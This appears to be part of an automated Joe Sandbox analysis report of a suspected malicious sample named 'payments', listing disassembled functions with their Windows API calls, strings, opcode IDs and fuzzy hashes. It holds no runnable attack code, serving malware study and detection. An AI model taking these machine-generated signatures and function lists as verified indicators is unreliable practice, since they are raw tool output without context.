                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: InvalidateRect
                                                                                                                          • String ID: @U=u
                                                                                                                          • API String ID: 634782764-2594219639
                                                                                                                          • Opcode ID: fcf18432a0d4f5a9d8d98eb0410ada4c7227617e76643cb68d40a85ac202369f
                                                                                                                          • Instruction ID: 9aa77b57e5608340e209b512d8b041c55f7a1fd61e9357de323dc3b149ce4cfc
                                                                                                                          • Opcode Fuzzy Hash: fcf18432a0d4f5a9d8d98eb0410ada4c7227617e76643cb68d40a85ac202369f
                                                                                                                          • Instruction Fuzzy Hash: 9E51B33164020DBBEF609F29CD85BBD3B65AB05314F244111FB25E66E2CB71EE449B52
                                                                                                                          Function 00CAA699 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 163windowCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 00D0DB1B
                                                                                                                          • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00D0DB3C
                                                                                                                          • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 00D0DB51
                                                                                                                          • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 00D0DB6E
                                                                                                                          • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00D0DB95
                                                                                                                          • DestroyIcon.USER32(00000000,?,?,?,?,?,?,00CAA67C,00000000,00000000,00000000,000000FF,00000000,000000FF,000000FF), ref: 00D0DBA0
                                                                                                                          • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 00D0DBBD
                                                                                                                          • DestroyIcon.USER32(00000000,?,?,?,?,?,?,00CAA67C,00000000,00000000,00000000,000000FF,00000000,000000FF,000000FF), ref: 00D0DBC8
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Icon$DestroyExtractImageLoadMessageSend
                                                                                                                          • String ID: @U=u
                                                                                                                          • API String ID: 1268354404-2594219639
                                                                                                                          • Opcode ID: 49b3a34af6d2a05996be219ffd80c6294826b65d64496c6781b7cbaaeb95d3d8
                                                                                                                          • Instruction ID: 260eeef5341034c566cbf205579ead6c851f8efb704448a23cb6074c01689914
                                                                                                                          • Opcode Fuzzy Hash: 49b3a34af6d2a05996be219ffd80c6294826b65d64496c6781b7cbaaeb95d3d8
                                                                                                                          • Instruction Fuzzy Hash: AE517A74600309EFDB20DF69CC81FAA77BAAB09754F144619F94AD72D0DBB0AD80DB60
                                                                                                                          Function 00C9936C Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 145COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • __swprintf.LIBCMT ref: 00C993AB
                                                                                                                          • __itow.LIBCMT ref: 00C993DF
                                                                                                                            • Part of subcall function 00CB1557: _xtow@16.LIBCMT ref: 00CB1578
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: __itow__swprintf_xtow@16
                                                                                                                          • String ID: %.15g$0x%p$False$True
                                                                                                                          • API String ID: 1502193981-2263619337
                                                                                                                          • Opcode ID: 14ae93742065e9824b55d459643868bdad422100ccbcff1c0929859bfb389ff6
                                                                                                                          • Instruction ID: b551567fafdd25dae6272a4fc3c66386f1691ceda232342b1fc21ac1926dbaf0
                                                                                                                          • Opcode Fuzzy Hash: 14ae93742065e9824b55d459643868bdad422100ccbcff1c0929859bfb389ff6
                                                                                                                          • Instruction Fuzzy Hash: 4941D371500205AFEB24EF79D946FAAB3E8FF49300F24446EE64AD71D1EA31DA41DB60
                                                                                                                          Function 00CCB907 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 81windowCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 00CCB98C
                                                                                                                          • GetDlgCtrlID.USER32 ref: 00CCB997
                                                                                                                          • GetParent.USER32 ref: 00CCB9B3
                                                                                                                          • SendMessageW.USER32(00000000,?,00000111,?), ref: 00CCB9B6
                                                                                                                          • GetDlgCtrlID.USER32(?), ref: 00CCB9BF
                                                                                                                          • GetParent.USER32(?), ref: 00CCB9DB
                                                                                                                          • SendMessageW.USER32(00000000,?,?,00000111), ref: 00CCB9DE
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: MessageSend$CtrlParent
                                                                                                                          • String ID: @U=u$ComboBox$ListBox
                                                                                                                          • API String ID: 1383977212-2258501812
                                                                                                                          • Opcode ID: 24befe46c068c92a5bcc5333193587bab3eeac0445392e124ebd079c06b9f660
                                                                                                                          • Instruction ID: 4746c588deaf036ab1d7d15aa5e1ca5a4df43c8b811d35a13c6417a197b5046b
                                                                                                                          • Opcode Fuzzy Hash: 24befe46c068c92a5bcc5333193587bab3eeac0445392e124ebd079c06b9f660
                                                                                                                          • Instruction Fuzzy Hash: EA21A1B5900208BFDF04ABA4CC96EFEBB75EF49300F104119F661A32A1DB745916AB70
                                                                                                                          Function 00CCB9F0 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 80windowCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 00CCBA73
                                                                                                                          • GetDlgCtrlID.USER32 ref: 00CCBA7E
                                                                                                                          • GetParent.USER32 ref: 00CCBA9A
                                                                                                                          • SendMessageW.USER32(00000000,?,00000111,?), ref: 00CCBA9D
                                                                                                                          • GetDlgCtrlID.USER32(?), ref: 00CCBAA6
                                                                                                                          • GetParent.USER32(?), ref: 00CCBAC2
                                                                                                                          • SendMessageW.USER32(00000000,?,?,00000111), ref: 00CCBAC5
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: MessageSend$CtrlParent
                                                                                                                          • String ID: @U=u$ComboBox$ListBox
                                                                                                                          • API String ID: 1383977212-2258501812
                                                                                                                          • Opcode ID: cc3e7231f8bf6ca4ef787be8be96f84b85772423042cd8413469b2b3033697c9
                                                                                                                          • Instruction ID: 54486e75467742b5b1a83e24ea258baebcc3d02d174e6e359feb0db91ab3335e
                                                                                                                          • Opcode Fuzzy Hash: cc3e7231f8bf6ca4ef787be8be96f84b85772423042cd8413469b2b3033697c9
                                                                                                                          • Instruction Fuzzy Hash: 382183B5940208BFDF01ABA4CC86FFEB775EF49300F104019F55197291DB75991AAB70
                                                                                                                          Function 00CD6F02 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 72networkCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: _wcscpy$CleanupStartup_strcatgethostbynamegethostnameinet_ntoa
                                                                                                                          • String ID: 0.0.0.0
                                                                                                                          • API String ID: 2620052-3771769585
                                                                                                                          • Opcode ID: 16a3ebbb6c546c9ecb312d9dad56eb863c160c6925f0dd56f213df38e85a0222
                                                                                                                          • Instruction ID: cc7db14f4ffe90f6f1d2d897225d16aa3a98d45bc6adb69cef2d419a4ca3f990
                                                                                                                          • Opcode Fuzzy Hash: 16a3ebbb6c546c9ecb312d9dad56eb863c160c6925f0dd56f213df38e85a0222
                                                                                                                          • Instruction Fuzzy Hash: B1110671904215BFCB24ABB0EC4AEDA77BCEF40714F104066F255E6281EF74DA86DBA0
                                                                                                                          Function 00CCBAD7 Relevance: 17.6, APIs: 4, Strings: 6, Instructions: 71windowCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • GetParent.USER32 ref: 00CCBAE3
                                                                                                                          • GetClassNameW.USER32(00000000,?,00000100), ref: 00CCBAF8
                                                                                                                          • _wcscmp.LIBCMT ref: 00CCBB0A
                                                                                                                          • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00CCBB85
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ClassMessageNameParentSend_wcscmp
                                                                                                                          • String ID: @U=u$SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                                                                          • API String ID: 1704125052-1428604138
                                                                                                                          • Opcode ID: 876a593f5ce255b523e66e64ecba0281151ee7261a8d235374599ebfc98f7383
                                                                                                                          • Instruction ID: 6399551506445e4de8b649f997ad1fdb5aed8d8782adf71c8884d42818c6fab8
                                                                                                                          • Opcode Fuzzy Hash: 876a593f5ce255b523e66e64ecba0281151ee7261a8d235374599ebfc98f7383
                                                                                                                          • Instruction Fuzzy Hash: 5411E376608307FFFA2466A5DC27EF737AD9F11320F20402AF914E50D5EFA1AD119524
                                                                                                                          Function 00CB500E Relevance: 16.8, APIs: 11, Instructions: 257COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • _memset.LIBCMT ref: 00CB5047
                                                                                                                            • Part of subcall function 00CB7C0E: __getptd_noexit.LIBCMT ref: 00CB7C0E
                                                                                                                          • __gmtime64_s.LIBCMT ref: 00CB50E0
                                                                                                                          • __gmtime64_s.LIBCMT ref: 00CB5116
                                                                                                                          • __gmtime64_s.LIBCMT ref: 00CB5133
                                                                                                                          • __allrem.LIBCMT ref: 00CB5189
                                                                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00CB51A5
                                                                                                                          • __allrem.LIBCMT ref: 00CB51BC
                                                                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00CB51DA
                                                                                                                          • __allrem.LIBCMT ref: 00CB51F1
                                                                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00CB520F
                                                                                                                          • __invoke_watson.LIBCMT ref: 00CB5280
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 384356119-0
                                                                                                                          • Opcode ID: d5e017027a87c5018ad803d53256558374d4b82fb585307daa6d96de3ac92c4c
                                                                                                                          • Instruction ID: e39c87c3c9338ca7ffbfaef222a847038b995a35e4abc01fb515c09b1d32ae69
                                                                                                                          • Opcode Fuzzy Hash: d5e017027a87c5018ad803d53256558374d4b82fb585307daa6d96de3ac92c4c
                                                                                                                          • Instruction Fuzzy Hash: 4871E7B2A01F16AFE714AF79CC81BDA73A8AF15764F144229F910D7281E770DE409BD1
                                                                                                                          Function 00CD4DDD Relevance: 16.7, APIs: 11, Instructions: 189windowsleepCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • _memset.LIBCMT ref: 00CD4DF8
                                                                                                                          • GetMenuItemInfoW.USER32(00D51708,000000FF,00000000,00000030), ref: 00CD4E59
                                                                                                                          • SetMenuItemInfoW.USER32(00D51708,00000004,00000000,00000030), ref: 00CD4E8F
                                                                                                                          • Sleep.KERNEL32(000001F4), ref: 00CD4EA1
                                                                                                                          • GetMenuItemCount.USER32(?), ref: 00CD4EE5
                                                                                                                          • GetMenuItemID.USER32(?,00000000), ref: 00CD4F01
                                                                                                                          • GetMenuItemID.USER32(?,-00000001), ref: 00CD4F2B
                                                                                                                          • GetMenuItemID.USER32(?,?), ref: 00CD4F70
                                                                                                                          • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00CD4FB6
                                                                                                                          • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00CD4FCA
                                                                                                                          • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00CD4FEB
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 4176008265-0
                                                                                                                          • Opcode ID: 8ebdea67401c97d2bc857cbaaaee65b730f5e6e379919afe590b248e8dfa76fe
                                                                                                                          • Instruction ID: 3203a3ecf5e617d56743d28c9e4876a48d1c26a72d7a1cb9239289ec020f8613
                                                                                                                          • Opcode Fuzzy Hash: 8ebdea67401c97d2bc857cbaaaee65b730f5e6e379919afe590b248e8dfa76fe
                                                                                                                          • Instruction Fuzzy Hash: 4261A171900349AFDB15CFA8D888AAEBBB9FB01308F14405AF751E73A1D730AE45DB20
                                                                                                                          Function 00CF9C16 Relevance: 16.7, APIs: 11, Instructions: 183windowCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00CF9C98
                                                                                                                          • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00CF9C9B
                                                                                                                          • GetWindowLongW.USER32(?,000000F0), ref: 00CF9CBF
                                                                                                                          • _memset.LIBCMT ref: 00CF9CD0
                                                                                                                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00CF9CE2
                                                                                                                          • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00CF9D5A
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: MessageSend$LongWindow_memset
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 830647256-0
                                                                                                                          • Opcode ID: eafaff3a0f70c957ef3c438bb212bf57f718d6b8c65ac0818ce74ea850a94aad
                                                                                                                          • Instruction ID: af36292b87f9ed7cdc89b2af1021e0c69deec1c6cd48c179b76c7e0657713402
                                                                                                                          • Opcode Fuzzy Hash: eafaff3a0f70c957ef3c438bb212bf57f718d6b8c65ac0818ce74ea850a94aad
                                                                                                                          • Instruction Fuzzy Hash: F4617B75900208AFDB10DFA8CC81FFEB7B8EB09704F244159FA15E72A1D770AA46DB61
                                                                                                                          Function 00CC94E1 Relevance: 16.6, APIs: 11, Instructions: 109memoryCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,00000000,?), ref: 00CC94FE
                                                                                                                          • SafeArrayAllocData.OLEAUT32(?), ref: 00CC9549
                                                                                                                          • VariantInit.OLEAUT32(?), ref: 00CC955B
                                                                                                                          • SafeArrayAccessData.OLEAUT32(?,?), ref: 00CC957B
                                                                                                                          • VariantCopy.OLEAUT32(?,?), ref: 00CC95BE
                                                                                                                          • SafeArrayUnaccessData.OLEAUT32(?), ref: 00CC95D2
                                                                                                                          • VariantClear.OLEAUT32(?), ref: 00CC95E7
                                                                                                                          • SafeArrayDestroyData.OLEAUT32(?), ref: 00CC95F4
                                                                                                                          • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00CC95FD
                                                                                                                          • VariantClear.OLEAUT32(?), ref: 00CC960F
                                                                                                                          • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00CC961A
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2706829360-0
                                                                                                                          • Opcode ID: b8acb693b0c3a052e4be16b59203614f765eabe67d5a10dc24bfd26cdf482fde
                                                                                                                          • Instruction ID: 1876ca6ff551549f4926f9213e915a983343e7f4c88c72d16d13387da6845c01
                                                                                                                          • Opcode Fuzzy Hash: b8acb693b0c3a052e4be16b59203614f765eabe67d5a10dc24bfd26cdf482fde
                                                                                                                          • Instruction Fuzzy Hash: 54411E71900219EFDB01EFA4D888EDEBB79FF08354F008069F512E7251DB31AA46DBA1
                                                                                                                          Function 00CEADAE Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 197comCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 00C9936C: __swprintf.LIBCMT ref: 00C993AB
                                                                                                                            • Part of subcall function 00C9936C: __itow.LIBCMT ref: 00C993DF
                                                                                                                          • CoInitialize.OLE32 ref: 00CEADF6
                                                                                                                          • CoUninitialize.OLE32 ref: 00CEAE01
                                                                                                                          • CoCreateInstance.OLE32(?,00000000,00000017,00D1D8FC,?), ref: 00CEAE61
                                                                                                                          • IIDFromString.OLE32(?,?), ref: 00CEAED4
                                                                                                                          • VariantInit.OLEAUT32(?), ref: 00CEAF6E
                                                                                                                          • VariantClear.OLEAUT32(?), ref: 00CEAFCF
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                                                                                                                          • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                                                                          • API String ID: 834269672-1287834457
                                                                                                                          • Opcode ID: ff5c03aa3f4b705111f45f4da2354938be8a263d7770d2459cd24f474165572b
                                                                                                                          • Instruction ID: 97458319d44329b15b740f9af6cdb7cdb270fc70a720b8dff2a5dd72d9637092
                                                                                                                          • Opcode Fuzzy Hash: ff5c03aa3f4b705111f45f4da2354938be8a263d7770d2459cd24f474165572b
                                                                                                                          • Instruction Fuzzy Hash: 66619D71208351AFC710DF96C849B6AB7E8AF88714F10441DF9959B2A1C770FE49CBA3
                                                                                                                          Function 00CACB8D Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 185windowCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • SetWindowLongW.USER32(?,000000EB), ref: 00CACC15
                                                                                                                            • Part of subcall function 00CACCCD: GetClientRect.USER32(?,?), ref: 00CACCF6
                                                                                                                            • Part of subcall function 00CACCCD: GetWindowRect.USER32(?,?), ref: 00CACD37
                                                                                                                            • Part of subcall function 00CACCCD: ScreenToClient.USER32(?,?), ref: 00CACD5F
                                                                                                                          • GetDC.USER32 ref: 00D0D137
                                                                                                                          • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00D0D14A
                                                                                                                          • SelectObject.GDI32(00000000,00000000), ref: 00D0D158
                                                                                                                          • SelectObject.GDI32(00000000,00000000), ref: 00D0D16D
                                                                                                                          • ReleaseDC.USER32(?,00000000), ref: 00D0D175
                                                                                                                          • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 00D0D200
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
